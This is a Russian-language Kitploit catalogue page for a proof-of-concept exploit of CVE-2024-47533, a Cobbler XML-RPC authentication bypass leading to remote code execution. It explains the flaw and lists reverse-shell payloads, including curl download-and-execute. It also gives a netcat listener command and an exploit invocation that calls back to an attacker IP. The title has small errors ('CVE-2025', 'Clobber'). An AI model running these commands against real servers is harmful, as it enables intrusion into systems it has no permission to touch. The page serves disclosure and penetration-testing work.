Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-47533 — CVE-2025-47533 Clobber RCE的PoC | Kitploit
Инструменты/GitHubGitHub/zs1n/cve-2024-47533
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubzs1n/cve-2024-47533

CVE-2024-47533

CVE-2025-47533 Clobber RCE的PoC

Репозиторий
111 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-47533 - Эксплойт RCE с обходом аутентификации XMLRPC в Cobbler

Критическое удалённое выполнение кода через обход аутентификации в Cobbler

Реализация PoC.


Краткое описание

Cobbler, сервер установки Linux, обеспечивающий быструю настройку сетевых установочных сред, имеет уязвимость аутентификации в версиях с 3.0.0 по (не включая) 3.2.3 и 3.3.7. Функция utils.get_shared_secret() всегда возвращает -1, что позволяет любому подключиться к XML-RPC интерфейсу Cobbler с пустым именем пользователя ('') и паролем -1. Это позволяет злоумышленнику, имеющему сетевой доступ, получить полный контроль над сервером Cobbler. Уязвимость исправлена в версиях 3.2.3 и 3.3.7.


🛠 Технический анализ

Уязвимость вызвана некорректной обработкой общего секрета в функции utils.get_shared_secret(), которая всегда возвращает -1, фактически обходя аутентификацию. Это позволяет любому сетевому пользователю подключиться к XMLRPC интерфейсу Cobbler с пустыми учётными данными и выполнять произвольные команды.


🔥 Уязвимая конечная точка

Скачать инструмент

http://<цель>:25151/ — конечная точка XMLRPC API Cobbler


💥 Примеры полезных нагрузок

Скрипт эксплойта поддерживает различные полезные нагрузки для обратной оболочки, включая:

  • Bash reverse shell
  • Netcat shell (nc)
  • Curl загрузка и выполнение

Доказательство концепции (PoC)

Подготовка слушателя

Запустите слушатель Netcat на вашей машине:

root@kitploit:~
nc -lvnp 4444

🚀 Запуск эксплойта

Запустите скрипт эксплойта CVE-2024-47533.py.

root@kitploit:~
python3 CVE-2024-47533.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash

Параметры

-t : Цель (Пример: -t http://<IP_СЕРВИСА>:<ПОРТ>)

-l: Локальный IP (Пример: -l 10.10.11.80)

-p : Порт <ЛОКАЛЬНЫЙ_ПОРТ> (Пример: -p 4444)

--payload: Полезная нагрузка (bash, curl, nc) (Пример: --payload bash)

💻 Успешный удалённый доступ к оболочке

При успешном выполнении обратная оболочка подключится обратно к слушателю, предоставляя злоумышленнику удалённый доступ к серверу.